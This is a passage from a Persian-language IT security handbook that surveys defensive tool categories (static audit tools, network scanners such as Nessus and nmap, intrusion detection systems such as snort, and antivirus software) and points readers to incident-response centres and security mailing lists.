‫ﻣﻠﻮﻥ‪ .‬ﺍﻳﻦ ﻣﺮﻛﺰ ﮔﺰﺍﺭﺷﺎﺕ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ ﺟﻤﻊﺁﻭﺭﻱ ﻣﻲﻛﻨﺪ‪ ،‬ﺑﻪ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺩﺭ ﻣﻮﺭﺩ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺁﮔـﺎﻫﻲ ﻣـﻲﺩﻫـﺪ‪ ،‬ﻭ ﺍﺯ ﻃـﺮﻑ‬
‫ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻤﻨﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﺸﺎﻥ ﻣﻨﺘﺸﺮ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺍﻳﻦ ﻣﺮﻛﺰ ﻭ ﺑـﺴﻴﺎﺭﻱ ﺩﻳﮕـﺮ ﺍﺯ ﻣﺮﺍﻛـﺰ ﻭﺍﻛـﻨﺶ ﺑـﻪ‬
‫ﺭﺧﺪﺍﺩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﻼﻓﺎﺻﻠﻪ ﭘﺲ ﺍﺯ ﺩﺭﻳﺎﻓﺖ ﻣﻨﺘﺸﺮ ﻧﻤﻲﻛﻨﻨﺪ‪ ،‬ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ﺑﻌﻨﻮﺍﻥ ﻣﻨﺒﻊ ﺍﺻﻠﻲ ﺍﻃﻼﻋﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﺧـﻮﺩ‬
‫ﺑﻪ ﺁﻧﻬﺎ ﺗﻜﻴﻪ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻣﻨﺒﻊ ﺟﺎﻳﮕﺰﻳﻦ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﻳﻚ ﻳﺎ ﺩﻭ ﮔﺮﻭﻩ ﭘﺴﺘﻲ ﺍﻣﻨﻴﺘﻲ ‪ -‬ﻣﺜﻞ‪ bugtraq ،nt-security‬ﻭ ‪ - firewalls‬ﺑﻪ ﻋـﻀﻮﻳﺖ‬
‫ﺩﺭﺁﻳﻴﺪ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‬


‫ﺍﺑﺰﺍﺭ ﺍﻣﻨﻴﺘﻲ ﺑﺮﻧﺎﻣﺔ ﻣﺨﺼﻮﺻﻲ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﺍﺭﺯﻳﺎﺑﻲ ﻳﺎ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻛـﻪ‬
‫ﺍﻣﺮﻭﺯﻩ ﻛﺎﺭﺑﺮﺩ ﺩﺍﺭﻧﺪ‪ ،‬ﺩﺭ ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﻭ ﻳﺎ ﺑﻮﺳﻴﻠﺔ ﻣﺘﺨﺼﺼﺎﻥ ﻣﺴﺘﻘﻞ ﺗﻮﻟﻴﺪ ﻭ ﺑﺼﻮﺭﺕ ﺭﺍﻳﮕﺎﻥ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺗﻮﺯﻳﻊ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺍﺑﺰﺍﺭﻫـﺎﻱ‬
‫ﺧﻮﺏ ﺩﻳﮕﺮﻱ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺼﻮﺭﺕ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺠﺎﺭﻱ ﺑﻪ ﻓﺮﻭﺵ ﻣﻲﺭﺳﻨﺪ‪.‬‬
‫ﭘﻨﺞ ﺩﺳﺘﻪ ﺍﺑﺰﺍﺭ ﺍﻣﻨﻴﺘﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻛﺎﺭ ﺭﺍﻫﺒﺮﺍﻥ ﺍﻣﻨﻴﺖ ﻭ ﺷﺒﻜﻪ ﺑﻴﺎﻳﻨﺪ‪ .‬ﺍﻳﻦ ﭘﻨﺞ ﺩﺳﺘﻪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺪﻧﺒﺎﻝ ﻧﻘﺎﻁ ﺿﻌﻔﻲ ﭘﻮﻳﺶ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﻳﻚ ﻛﺎﺭﺑﺮ ﻣﺤﻠﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺁﻧﻬﺎ ﺭﺍ ﻣﻮﺭﺩ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻗﺮﺍﺭ ﺩﻫﺪ؛‬ ‫•‬

‫‪200 Built-in Access List‬‬


‫‪ ۲۰۱‬ﺍﻧﺠﻤﻦ ﻭﺍﻛﻨﺶ ﺑـﻪ ﺭﺧـﺪﺍﺩ ﻭ ﮔﺮﻭﻫﻬـﺎﻱ ﺍﻣﻨﻴﺘـﻲ‪ ،‬ﻛﻨـﺴﺮﺳﻴﻮﻡ ﺟﻬـﺎﻧﻲ ﺟﻬـﺎﻧﻲ ﮔﺮﻭﻫﻬـﺎﻱ ﻭﺍﻛـﻨﺶ ﺑـﻪ ﺭﺧـﺪﺍﺩﻫﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ‪ .‬ﺑـﺮﺍﻱ ﺍﻃﻼﻋـﺎﺕ ﺑﻴـﺸﺘﺮ ﺑـﻪ ﺁﺩﺭﺱ‬
‫‪ http://www.first.org‬ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪.‬‬
‫‪202 Computer Emergency Response Team / Coordination Center‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٥٤‬‬

‫ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺩﺭ ﻃﻮﻝ ﺯﻣﺎﻥ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻨﺪ ﻭ ﻣﺮﺍﻗﺐ ﺗﻐﻴﻴﺮﺍﺕ ﻏﻴﺮﻣﺠﺎﺯ ﻫﺴﺘﻨﺪ؛‬ ‫•‬
‫ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺷﺒﻜﻪ ﺭﺍ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻧﻘﺎﻁ ﺿﻌﻒ ﺷﺒﻜﻪﺍﻱ ﭘﻮﻳﺶ ﻣﻲﻛﻨﻨﺪ؛‬ ‫•‬
‫ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺳﻴﺴﺘﻢ ﻭ ﺷﺒﻜﻪ ﺭﺍ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺣﻤﻼﺕ ﺩﺭﺣﺎﻝ ﺍﻧﺠﺎﻡ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ؛ ﻭ‬ ‫•‬
‫ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﻛﻠﻴﺔ ﻓﻌﻞ ﻭ ﺍﻧﻔﻌﺎﻻﺕ ﺷﺒﻜﻪ ﺭﺍ ﺑﺮﺍﻱ ﺗﺤﻠﻴﻠﻬﺎﻱ ﺑﻌﺪﻱ ﺛﺒﺖ ﻭ ﺿﺒﻂ ﻣﻲﻧﻤﺎﻳﻨﺪ‪.‬‬ ‫•‬

‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺧﻮﺩﻛﺎﺭ )ﻣﻌﻤﻮ ﹰﻻ( ﻳﻚ ﺭﻭﺵ ﻛﻢﻫﺰﻳﻨﻪ ﻭ ﻣﺆﺛﺮ ﺑﺮﺍﻱ ﻧﻈﺎﺭﺕ ﻭ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺳﻴـﺴﺘﻢ ﺍﺳـﺖ‪ .‬ﺑﺮﺧـﻲ ﺍﺯ ﺍﻳـﻦ ﺍﺑﺰﺍﺭﻫـﺎ‬
‫ﺗﻮﺳﻂ ﻣﻬﺎﺟﻤﺎﻥ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﺗﺎ ﻧﻘﺎﻁ ﺿﻌﻒ ﺭﺍ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﺮﺍﻱ ﺁﻧﻬﺎ ﺁﺷﻜﺎﺭ ﻛﻨﻨﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺷﻤﺎ ﻧﻴﺰ ﺑﺎﻳﺪ‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺩﺳﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪.‬‬

‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺗﺼﻮﻳﺮﺑﺮﺩﺍﺭﻱ ﻟﺤﻈﻪﺍﻱ‬


‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺗﺼﻮﻳﺮﺑﺮﺩﺍﺭﻱ ﻟﺤﻈﻪﺍﻱ‪ ٢٠٣‬ﻳﺎ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﻤﻴﺰﻱ ﺍﻳﺴﺘﺎ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺪﻧﺒﺎﻝ ﻧﻘﺎﻁ ﺿﻌﻒ ﭘـﻮﻳﺶ ﻣـﻲﻛﻨﻨـﺪ ﻭ ﻧﺘـﺎﻳﺞ ﺁﻧـﺮﺍ ﺩﺭ ﻳـﻚ‬
‫ﮔﺰﺍﺭﺵ ﮔﺮﺩﺁﻭﺭﻱ ﻣﻲﻧﻤﺎﻳﻨﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺩﺭ ﻳﻚ ﺳﻴﺴﺘﻢ ‪ ،Unix‬ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻳﻜـﻲ ﺍﺯ ﺍﺑﺰﺍﺭﻫـﺎ ﻣﺤﺘـﻮﺍﻱ ﻓﺎﻳـﻞ ‪ /etc/passwd‬ﺭﺍ‬
‫ﺑﺮﺭﺳﻲ ﻛﻨﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﺩ ﻫﻴﭽﻜﺲ ﺑﺠﺰ ﺍﺑﺮﻛﺎﺭﺑﺮ ﻣﺠﻮﺯ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴﺮ ﺩﺭ ﺁﻧﺮﺍ ﻧﺪﺍﺭﺩ‪ .‬ﺍﺑﺰﺍﺭﻫﺎﻱ ﺗﺼﻮﻳﺮﺑﺮﺩﺍﺭﻱ ﻟﺤﻈﻪﺍﻱ ﺑﺮﺭﺳﻴﻬﺎﻱ ﺑـﺴﻴﺎﺭ‬
‫ﺯﻳﺎﺩﻱ )ﺷﺎﻳﺪ ﺻﺪﻫﺎ ﺑﺮﺭﺳﻲ( ﺭﺍ ﺩﺭ ﻣﺪﺕﺯﻣﺎﻧﻲ ﻛﻮﺗﺎﻩ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ‪.‬‬
‫ﻳﻚ ﺍﺑﺰﺍﺭ ﺟﺪﻳﺪ ﺗﺼﻮﻳﺮﺑﺮﺩﺍﺭﻱ ﻟﺤﻈﻪﺍﻱ ﺩﺭ ‪ Tiger ،Unix‬ﻧﺎﻡ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﺩﺍﻧﺸﮕﺎﻩ ‪ A&M‬ﺗﮕﺰﺍﺱ ﺗﻬﻴﻪ ﺷﺪﻩ ﺍﺳﺖ‪ Tiger .‬ﺭﻭﻱ ﺍﻧﻮﺍﻉ‬
‫ﮔﺴﺘﺮﺩﻩﺍﻱ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﺍﺟﺮﺍ ﻣﻲﺷﻮﺩ ﻭ ﻧﺼﺐ ﺁﻥ ﻃﻲ ﻓﺮﺁﻳﻨﺪﻱ ﺳﺎﺩﻩ ﺍﻧﺠﺎﻡ ﻣﻲﮔﻴـﺮﺩ‪ .‬ﺑـﺮﺍﻱ ﺍﻳـﻦ ﻣﻨﻈـﻮﺭ ﺩﺭ ﺩﻧﻴـﺎﻱ ‪Windows‬‬
‫ﭼﻨـﺪﻳﻦ ﺑـﺴﺘﺔ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ؛ ﻣﺜـﻞ ﺑﺮﻧﺎﻣـﺔ ‪ (KSA) Kane Security Analyst‬ﺍﺯ ﺷـﺮﻛﺖ ‪Intrusion Detection‬‬
‫)‪ (http://www.intrusion.com‬ﻛﻪ ﺑﻪ ﺑﺮﺭﺳﻲ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻭ ﻣﺠﻮﺯﻫﺎ )ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ( ﻣﻲﭘﺮﺩﺍﺯﺩ ﻭ ﺑﺮ ﺻﺤﺖ ﺩﺍﺩﻩﻫﺎ ﻧﻈﺎﺭﺕ ﻣـﻲﻛﻨـﺪ‪.‬‬
‫‪ NAT‬ﺍﺑﺰﺍﺭ ﺭﺍﻳﮕﺎﻧﻲ ﺑـﺮﺍﻱ ﺍﺭﺯﻳـﺎﺑﻲ ‪ NetBIOS‬ﻭ ﻣﺤﺮﻣـﺎﻧﮕﻲ ﺭﻣـﺰ ﻋﺒـﻮﺭ ‪ NT‬ﺍﺳـﺖ ﻛـﻪ ﺗﻮﺳـﻂ ﺷـﺮﻛﺖ ‪Security Advisors‬‬
‫‪٢٠٤‬‬
‫)‪ (http://www.secnet.com‬ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ‪ .‬ﺩﻭ ﺍﺑﺰﺍﺭ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ‪ NT‬ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ‪ Scan NT‬ﺗﻮﻟﻴﺪ ﺍﻧـﺪﻱ ﺑـﺎﺭﻭﻥ‬
‫)‪ (http://www.ntsecurity.com/Products/ScanNT/index.htm‬ﻭ ‪ L0pht Crack‬ﺗﻮﻟﻴﺪ "ﻣﺤﻘﻘﺎﻥ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ" ﺩﺭ ﻣﺆﺳﺴﻪ ﺻـﻨﺎﻳﻊ‬
‫ﺳﻨﮕﻴﻦ ‪.L0pht‬‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺗﺼﻮﻳﺮﺑﺮﺩﺍﺭﻱ ﻟﺤﻈﻪﺍﻱ ﺑﺎﻳﺪ ﻃﺒﻖ ﻳﻚ ﺭﻭﺍﻝ ﻣﻨﻈﻢ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻳﻨﺪ ‪ -‬ﺣﺪﺍﻗﻞ ﻳﻜﺒﺎﺭ ﺩﺭ ﻣﺎﻩ‪ .‬ﺧﺮﻭﺟﻴﻬﺎﻱ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫـﺎ ﺭﺍ ﺑـﺪﻗﺖ‬
‫ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻭ ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﻣﻮﺍﺭﺩ ﻣﺸﻜﻮﻙ ﺭﺍ ﭘﻴﮕﻴﺮﻱ ﻛﻨﻴﺪ‪ .‬ﺑﻪ ﻳـﺎﺩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺍﻳـﻦ ﺧﺮﻭﺟﻴﻬـﺎ ﺭﺍ ﺩﺭ ﺩﺳـﺘﺮﺱ‬
‫ﺩﻳﮕﺮﺍﻥ ﻗﺮﺍﺭ ﻧﺪﻫﻴﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﻃﺒﻖ ﺗﻌﺮﻳﻒ‪ ،‬ﻫﻤﺎﻥ ﻣﻨﺎﻓﺬﻱ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻬﺎﺟﻤﺎﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﻧﻔﻮﺫ ﻛﻨﻨﺪ‪.‬‬

‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﻮﻳﺸﮕﺮ ﺷﺒﻜﻪ‬


‫ﺍﻳﻦ ﺍﺑﺰﺍﺭﻫﺎ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺷﺒﻜﻪ ﻣﺜﻞ ‪ send mail‬ﻭ ‪ ftpd‬ﺭﺍ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﺍﺷﻜﺎﻻﺕ ﻣﺘﺪﺍﻭﻝ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺭﺳﻲ ﻣـﻲﻛﻨﻨـﺪ‪ .‬ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺷـﻤﺎ‬
‫ﻣﻄﻤﺌﻨﹰﺎ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻤﺎﻥ ﻋﻼﻗﻤﻨﺪ ﺑﻪ ﻧﻔﻮﺫ ﺑﻪ ﺳﻴﺴﺘﻢ ﭘﻮﻳﺶ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺧﻮﺩ ﺷﻤﺎ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻭﺭﻳﺪ‪ .‬ﺩﺭ‬
‫ﻣﻴﺎﻥ ﻗﺪﺭﺗﻤﻨﺪﺗﺮﻳﻦ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺭﺍﻳﮕﺎﻥ ﻣﻮﺟﻮﺩ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ‪ ،Unix‬ﻣﻲﺗﻮﺍﻥ ﺍﺯ ‪ (http://www.nessus.org) Nessus‬ﻧـﺎﻡ ﺑـﺮﺩ‪.‬‬
‫ﺷﺮﻛﺖ ‪ (http://www.somarsoft.com) SomarSoft‬ﭼﻨﺪﻳﻦ ﺍﺑﺰﺍﺭ ﺑﺮﺍﻱ ﺗﺤﻠﻴﻞ ﺍﻃﻼﻋﺎﺕ ﺟﻤﻊﺁﻭﺭﻱﺷﺪﻩ ﺩﺭ ﺛﺒﺘﻬﺎ ﻭ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﺩﺍﺩﻩ‬
‫‪ Windows NT‬ﺍﺭﺍﺋﻪ ﻛﺮﺩﻩ ﺍﺳﺖ‪ KSA .‬ﻛﻪ ﭘﻴﺸﺘﺮ ﺩﺭ ﻣﻮﺭﺩ ﺁﻥ ﺻﺤﺒﺖ ﻛﺮﺩﻳﻢ ﻧﻴـﺰ ﺑـﺮﺍﻱ ﺑـﺴﺘﺮﻫﺎﻱ ﻣﺒﺘﻨـﻲ ﺑـﺮ ‪Windows NT‬‬
‫ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺗﺤﻠﻴﻞ ﻭ ﺑﺮﺭﺳﻲ ﺻﺤﺖ ﺭﺍ ﭘﺪﻳﺪ ﻣﻲﺁﻭﺭﺩ‪ .‬ﻳﻚ ﭘﻮﻳﺸﮕﺮ ﻗﻮﻱ ﺩﻳﮕﺮ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ‪ ٢٠٥nmap‬ﻛﻪ ﺷﺒﻜﻪ ﺭﺍ ﺑـﺪﻧﺒﺎﻝ ﭘﻮﺭﺗﻬـﺎﻱ‬
‫ﺑﺎﺯ ﭘﻮﻳﺶ ﻣﻲﻛﻨﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﺪ ﺷﺒﻜﻪﻫﺎ ﺭﺍ ﻧﮕﺎﺷﺖ ﻧﻤﺎﻳﺪ‪ ،‬ﻭ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﭘﺎﺳﺨﻬﺎﻱ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﭘﻮﻳﺸﻬﺎﻱ ﺷﺒﻜﻪ ﻧـﻮﻉ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﺁﻧـﺮﺍ‬
‫ﺣﺪﺱ ﺑﺰﻧﺪ‪.‬‬

‫‪203 Snapshot Tools‬‬


‫‪204 Andy Baron‬‬
‫‪205 http://www.insecure.org/nmap‬‬
‫‪٣٥٥‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ )‪IDS‬ﻫﺎ(‪ ٢٠٦‬ﺩﺭ ﺩﻧﻴﺎﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﻌﺎﺩﻝ ﺩﺯﺩﮔﻴﺮﻫﺎ ﺩﺭ ﺯﻧﺪﮔﻲ ﻣﻌﻤﻮﻟﻲ ﻫﺴﺘﻨﺪ‪ .‬ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺍﺯ ﻧﺎﻡ ﺁﻧﻬﺎ ﭘﻴـﺪﺍ ﺍﺳـﺖ‪،‬‬
‫ﺍﻳﻦ ﺍﺑﺰﺍﺭﻫﺎ ﻫﻨﮕﺎﻡ ﻛﺎﺭ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﺑﺮ ﺁﻥ ﻧﻈﺎﺭﺕ ﻣﻲﻛﻨﻨﺪ ﻭ ﻣﺘﺮﺻﺪ ﻳﺎﻓﺘﻦ ﻧﺸﺎﻧﻪﻫﺎﻳﻲ ﻣﺒﻨﻲ ﺑﺮ ﺗﻼﺵ ﻳﻚ ﻣﻬﺎﺟﻢ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﺒﺘﻨﻲ ﺑﺮ ﺷﺒﻜﻪ ﻳﺎ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻴﺰﺑﺎﻥ ﺑﺎﺷﻨﺪ‪ .‬ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﻬﺎﺟﻢﻳﺎﺏ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻴﺰﺑﺎﻥ ﻣﺮﺍﻗﺐ ﻧﻔـﻮﺫ ﺑـﻪ‬
‫ﺁﻥ ﻣﻴﺰﺑﺎﻥ ﺧﺎﺹ ﺍﺳﺖ‪ .‬ﺑﻴﺸﺘﺮ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻤﻴﺰﻱ ﺍﻣﻦ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﺘﻜﻲ ﻫﺴﺘﻨﺪ‪ .‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ ﻣﺒﺘﻨﻲ ﺑـﺮ‬
‫ﺷﺒﻜﻪ‪ ،‬ﻳﻚ ﺷﺒﻜﻪ ﺭﺍ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻋﻼﺋﻢ ﻧﻔﻮﺫ ﺑﻪ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﻴﺸﺘﺮ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ‪ ،‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﻴﭽﻴﺪﺓ ﻧﻈﺎﺭﺕ ﺑـﺮ‬
‫ﺷﺒﻜﻪ ﻫﺴﺘﻨﺪ ﻛﻪ ﺍﺯ ﻭﺍﺳﻄﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ‪ Eternet‬ﺑﻌﻨﻮﺍﻥ ﺩﻳﺪﺑﺎﻥ ﺑﺴﺘﻪﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻣﺜﺎﻝ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ‬
‫ﻣﺒﺘﻨﻲ ﺑﺮ ﺷﺒﻜﻪ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ‪ snort‬ﺍﺷﺎﺭﻩ ﻛﺮﺩ‪.‬‬

‫ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ‬
‫ﺑﺎﺯﺍﺭ ﺑﺰﺭﮔﻲ ﺑﺮﺍﻱ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻭﻳﺮﻭﺱﻳﺎﺏ ﺩﺭ ﻣﺤﻴﻂ ‪ Windows‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻫﻨﮕﺎﻡ ﺍﻧﺘﺨﺎﺏ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺿﺪﻭﻳﺮﻭﺱ‪ ،‬ﻧﻪﺗﻨﻬـﺎ ﺑـﻪ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ‬
‫ﻣﺤﺼﻮﻝ‪ ،‬ﺑﻠﻜﻪ ﺑﻪ ﻧﻮﻉ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﺮﺍﻫﻢﺷﺪﻩ ﺑﺮﺍﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻓﻬﺮﺳﺖ ﻭﻳﺮﻭﺳﻬﺎﻱ ﻗﺎﺑـﻞ ﺷﻨﺎﺳـﺎﻳﻲ ﺁﻥ ﻧﻴـﺰ ﺗﻮﺟـﻪ ﻛﻨﻴـﺪ‪ .‬ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎﻱ ﺗﺠﺎﺭﻱ ﺍﺯ ﻣﺪﻝ ﻋﻀﻮﻳﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﻃﺒﻖ ﺁﻥ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﻋﻀﻮﻳﺖ ﺷﻤﺎ ﺩﺭ ﺁﻥ ﺍﺩﺍﻣـﻪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻴﻬﺎ ﺭﺍ ﺑﺼﻮﺭﺕ ﻫﻔﺘﮕﻲ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻴﺪ‪.‬‬
